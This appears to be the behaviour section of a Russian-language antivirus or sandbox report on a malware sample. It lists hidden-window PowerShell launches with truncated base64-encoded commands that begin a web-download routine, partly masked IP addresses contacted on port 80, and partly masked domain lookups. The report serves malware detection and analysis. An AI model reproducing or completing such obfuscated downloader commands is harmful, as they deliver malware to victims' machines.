Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAF8AXwAzADEAOQA9ACgAJwBFADIAJwArACcAMAA4ADUANgAnACkAOwAkAG8ANgA2ADAANQAyADcANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAF8AOABfADQAOAA4ADUAPQAoACcAaAB0AH...
- '22#.#4.214.122':80
- '79.##7.86.189':80
- DNS ASK dm###oup.com.vn
- DNS ASK en###sh-run.com
- DNS ASK el##joy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAF8AXwAzADEAOQA9ACgAJwBFADIAJwArACcAMAA4ADUANgAnACkAOwAkAG8ANgA2ADAANQAyADcANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAF8AOABfADQAOAA4ADUAPQAoACcAaAB0AH...' (со скрытым окном)